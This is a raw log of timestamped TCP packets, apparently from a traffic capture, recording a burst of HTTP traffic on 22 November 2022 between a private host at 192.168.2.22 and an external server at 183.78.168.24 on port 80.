                                                                                Nov 22, 2022 05:09:11.636591911 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.636615038 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.636641026 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.636651993 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.636718035 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.637017965 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.637059927 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.637080908 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.637099028 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.637115955 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.637132883 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.637140989 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.637151003 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.637170076 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.637185097 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.637190104 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.637206078 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.637217999 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.637227058 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.637249947 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.637250900 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.637274981 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.637299061 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.637319088 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.637325048 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.637343884 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.637362003 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.637379885 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.637401104 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.637406111 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.637417078 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.637432098 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.637450933 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.637466908 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.637490034 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.637491941 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.637845039 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.640069008 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.643548965 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.643584013 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.643604040 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.643721104 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.643789053 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.643832922 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.643870115 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.643929005 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.644026041 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.644083023 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.644133091 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.644201994 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.644248009 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.644292116 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.644407988 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.644495010 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.644540071 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.644562960 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.644670963 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.644730091 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.644773960 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.644821882 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.644917965 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.644967079 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.645041943 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.645103931 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.645157099 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.645196915 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.645282984 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.645340919 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.645353079 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.645456076 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.645570993 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.645612955 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.645653963 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.645709991 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.645751953 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.645797014 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.645932913 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.645951986 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.646061897 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.646086931 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.646166086 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.646325111 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.787007093 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.787082911 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.787152052 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.790741920 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.790808916 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.790870905 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.790920973 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.790971041 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.791045904 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.791259050 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.791323900 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.791382074 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.791420937 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.791523933 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.791584015 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.791642904 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.791676998 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.791726112 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.791826963 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.791922092 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.791935921 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.792051077 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.792104959 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.792159081 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.792213917 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.792268038 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.792320013 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.792443991 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.792510986 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.792567968 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.792622089 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.792633057 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.792737961 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.792841911 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.792896032 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.792896032 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.792992115 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.793045044 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.793101072 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.793174982 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.793227911 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.794631004 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.797635078 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.797693968 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.797801971 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.797878981 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.797907114 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.797960997 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.798064947 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.798120975 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.798176050 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.798278093 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.798415899 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.798471928 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.798474073 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.798525095 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.798676968 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.798732996 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.798733950 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.798794031 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.798923969 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.798978090 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.798979044 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.799074888 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.799129009 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.799182892 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.799251080 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.799350977 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.799406052 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.799457073 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.799479008 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.799577951 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.799689054 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.799743891 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.799762011 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.799866915 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.799920082 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.799973965 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.800029039 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.800132036 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.800252914 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.800306082 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.800307035 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.800404072 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.800935030 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.828244925 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.941447973 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.941521883 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.941580057 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.944946051 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.945005894 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.945080996 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.945143938 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.945199013 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.945252895 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.945306063 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.945360899 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.945415974 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.945471048 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.945522070 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.945632935 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.945746899 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.945801020 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.945815086 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.945947886 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.946012974 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.946244001 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.946326017 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.946387053 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.946521044 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.946624994 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.946679115 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.946691990 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.946799040 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.946844101 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.946856976 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.946997881 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.947051048 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.947062969 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.947125912 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.947176933 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.947236061 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.947290897 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.947344065 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.947416067 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.947474957 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.947526932 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.948681116 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.948795080 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.948860884 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.952044010 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.952100992 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.952224970 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.952280998 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.952281952 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.952382088 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.952434063 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.952486992 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.952606916 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.952661991 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.952721119 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.982328892 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.982388973 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.982444048 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.982454062 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.982497931 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.982552052 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.982598066 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.982605934 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.982659101 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.982714891 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.982764006 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.982769012 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.982944965 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.982999086 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.983047962 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.983051062 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.983156919 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.983202934 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.983293056 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.983347893 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.983433962 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.983483076 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.983489990 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.983648062 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.983705044 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.983753920 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.983794928 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.983850956 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.983947992 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.983997107 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.984044075 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.984097958 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.986403942 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.095818996 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.095895052 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.096479893 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.099407911 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.099478960 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.099555016 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.099576950 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.099634886 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.099688053 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.099766970 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.099776983 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.099834919 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.099956989 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.100047112 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.100091934 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.100105047 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.100157976 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.100225925 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.100306034 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.100359917 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.100460052 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.100539923 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.100603104 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.100702047 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.100883961 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.100963116 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.101007938 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.101063967 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.101115942 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.101185083 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.101207972 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.101313114 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.101412058 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.101501942 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.101557016 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.101562977 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.101667881 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.101774931 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.102732897 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.102792978 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.103111982 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.106422901 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.106534004 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.106609106 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.106626987 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.106683969 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.106740952 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.106803894 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.106828928 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.106909990 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.107027054 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.107093096 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.136976004 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.137067080 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.137106895 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.137144089 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.137145042 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.137195110 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.137233019 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.137240887 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.137265921 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.137367010 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.137414932 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.137458086 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.137603998 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.137655020 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.137711048 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.137747049 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.137818098 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.137871027 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.137932062 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.137988091 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.138108015 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.138149023 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.138202906 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.138251066 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.138298035 CET4917580192.168.2.22183.78.168.24
